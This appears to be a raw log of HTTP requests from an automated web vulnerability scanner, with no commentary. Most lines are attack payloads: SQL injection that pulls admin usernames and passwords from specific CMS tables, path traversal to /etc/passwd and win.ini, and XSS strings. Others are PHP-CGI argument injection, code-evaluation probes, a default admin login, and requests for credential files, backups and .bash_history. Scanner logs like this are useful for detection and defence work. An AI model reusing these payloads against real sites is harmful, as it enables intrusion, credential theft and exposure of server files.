GET /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
GET /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
GET /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
GET /admin/admin_database.aspx
GET /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
GET /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
GET /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
GET /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
GET /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
GET /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
GET /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
GET /cctrl/backup/index.php
GET /cctrl/admin/purview/purview.php
HEAD /data_Xbaby/gdjm133950.mdb
GET /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
GET /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
GET /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
POST /admin/upfile.asp
POST /admin/upfile_yqhy.asp
GET /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
GET /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
GET /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
POST /VIEWGOOD/ADI/portal/UserDataSync.aspx
POST /SPM/Pc/Content/Request.aspx?action=name_check
GET /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
GET /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
GET /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
GET /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
GET /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
POST /include/upload.asp
GET /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
GET /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
GET /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
GET /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
GET /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
GET /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
GET /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
GET /products.asp
GET /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
GET /product_view.asp
HEAD /system/database/data.mdb
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
POST /manage/CHKLOGIN.ASP
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
POST /search.asp
GET /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
HEAD /db1/%23kepu.mdb
POST /upfile.asp
POST /upfile2.asp
POST /upfile3.asp
HEAD /data/xinfang.mdb
GET /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
HEAD /gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
GET /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
POST /WS/WebServiceBase.asmx/GetXMLList
POST /WS/WebService.asmx/GetFile
POST /WS/WebService.asmx/GetFileContent
GET /WS/WebService.asmx
POST /bos/desktop/ajax/EcAjax.aspx
GET /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
GET /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
GET /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
POST /interface/ipsconnect/ipsconnect.php
GET /templates/
GET /service/local/outreach/welcome/nexusSpaces.css
GET /phpRedisAdmin/?overview
GET /?overview
GET /index.html#/dashboard/file/logstash.json
GET /
GET /index.php/weblinks-categories?id=just_test
POST /index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
POST /FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
GET /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
GET /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
GET /oxoxoxoxoxoxox.com
GET /oxoxoxoxoxoxox.com/
POST /api/xmlrpc
HEAD /wwwroot.rar
HEAD /wwwroot.zip
HEAD /wwwroot.tar.gz
HEAD /web.rar
HEAD /www.rar
HEAD /www.zip
HEAD /www.tar.gz
HEAD /web.zip
GET /crossdomain.xml
PUT /webscan_test.txt
GET /phpinfo.php
GET /info.php
GET /test.php
GET /shop.php?ac=view&shopid=1-cfreer
GET /wp-includes/registration-functions.php
GET /wp-includes/registration.php
GET /
GET /
GET /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
GET /pass.txt
GET /passwd
GET /password.txt
GET /passwords.txt
GET /users.txt
GET /users.ini
GET /admin.cfg
GET /install.log
GET /database.inc
GET /common.inc
GET /db.inc
GET /connect.inc
GET /conn.inc
GET /sql.inc
GET /.bash_history
GET /.bashrc
GET /Web.config
GET /Global.asax
GET /Global.asa
GET /Global.asax.cs
GET /data.mdb
GET /domcfg.nsf
GET /names.nsf
GET /log.nsf
GET /domlog.nsf
GET /.rediscli_history
GET /data/%23data.mdb
GET /config.inc.php.bak
GET /config/config_ucenter.php.bak
GET /config/config_global.php.bak
GET /uc_server/data/config.inc.php.bak
GET /data/common.inc.php.bak
GET /wp-config.php.bak
GET /WEB-INF/database.properties
GET /
GET /robots.txt
GET /
GET /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
GET /
GET /nevercouldexistfilenosec
GET /nevercouldexistfilewebsec
GET /nevercouldexistfilenosec.aspx
GET /nevercouldexistfilewebsec.aspx
GET /nevercouldexistfilenosec.shtml
GET /nevercouldexistfilewebsec.shtml
GET /nevercouldexistfilenosec/
GET /nevercouldexistfilewebsec/
GET /nevercouldexistfilenosec.zip
GET /nevercouldexistfilewebsec.zip
GET /nevercouldexistfilenosec.php
GET /nevercouldexistfilewebsec.php
GET /nevercouldexistfilenosec.bak
GET /nevercouldexistfilewebsec.bak
GET /nevercouldexistfilenosec.rar
GET /nevercouldexistfilewebsec.rar
GET /
GET /wp-admin
GET /admin.php
GET /
GET /dede/
GET /administrator/
GET /user
PUT /jsky_web_scanner_test_file.txt
TRACE /TRACE_test
GET /nosec_Web_Scanner_Test.dll
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
TRACK /TRACK_test
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
OPTIONS /
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
GET /_vti_bin/_vti_adm/admin.dll
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
GET /_vti_bin/_vti_aut/author.dll
GET /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
GET /_vti_bin/shtml.exe?_vti_rpc
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
GET /server-info
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /server-status
GET /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
GET /jmx-console/
GET /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
GET /web-console/
GET /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
GET /
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
GET /webscan360noThisFile*~1*/.aspx
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
POST /cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
POST /cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /.../.../.../.../.../.../.../.../windows/win.ini
POST /cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
POST /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
GET /
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
GET /phpMyAdmin/show_config_errors.php
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
GET /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
GET /xampp/index.php
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
GET /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
GET /etc/passwd
GET /etc/passwd
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
GET /?search=just_test_not_find_href
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
GET /$
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
GET /solr/dev/admin/
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
GET /
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
GET /level/15/exec/-/show/running-config/CR
GET /plugins/weathermap/weathermap-cacti-plugin.php
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
GET /
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
GET /.../.../.../.../.../.../.../.../etc/passwd
GET /
GET /icons/index
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /icons/small/index
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
GET /
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
GET /
GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
GET /
GET /%3Cscript%3Ealert(42873).do
GET /
GET /%3Cscript%20s%3Ealert(42873)
GET /
GET /
GET /?%22onmouseover='prompt(42873)'bad=%22%3E
GET /%22%3E%3CsCrIpT%3Eprompt(42873)
GET /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
GET /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
GET /
GET /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
GET /
GET /'IHLD
GET /
GET /
GET /
GET /install.php
GET /
GET /
GET /install/index.php
GET /fckeditor/editor/dialog/fck_about.html
GET /
GET /extras/curltest.php?url=file://curltest.php
GET /
GET /.svn/entries
GET /
GET /
GET /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
GET /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
POST /plus/carbuyaction.php
GET /plus/carbuyaction.php?dopost=return&code=../../index
GET /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
GET /yp/product.php?q=&action=searchlist&where=%23
GET /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
GET /yp/product.php?pagesize=$%7B@print(md5(42873))%7D
GET /index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
GET /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /_database/qiye_free.asp
GET /apps/include.php?file=index.php
GET /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
POST /manage/login.php
GET /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
GET /api/upload/swfthumbnail.php?id=../../include/common.inc.php
GET /Inc/conn.asp
POST /user/reg3.php
GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
GET /celive/js/include.php?departmentid=webscan'&cmseasylive=1
GET /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
GET /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
GET /ask/search_ajax.php?q=s%bb%27
GET /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /web/?id=-1'
GET /huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
GET /js/calendar.php?lang=../js
GET /xampp/showcode.php/showcode.php?showcode=1
GET /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
POST /login.php
GET /admin/index.asp
GET /Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
GET /phpcms/data/js.php?id=1
GET /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
GET /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
GET /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?user-getpass-1'
GET /?user-space-1'
POST /index.php
GET /admin/sysadmin_view.asp
GET /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
POST /index.php?user-getpass
GET /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
GET /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
GET /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
POST /register.php?do=submit
POST /management/login.asp
GET /index.php?-dauto_prepend_file%3d/etc/passwd+-n
POST /tools/ajax.aspx
GET /show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
GET /bom.php?dir=.
GET /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
GET /myly.aspx?username=test'%20and%20@@version%3E0--
GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
POST /?product-gnotify
POST /Index.action
POST /index.action
POST /login.action
POST /index.php/api/xmlrpc
GET /CVS/Root
GET /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
GET /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
GET /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
GET /plugin.php?id=Network114:Network114&ljtype=1%bf%27
GET /group/group.php?id=1%27webscan_draGxn
GET /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
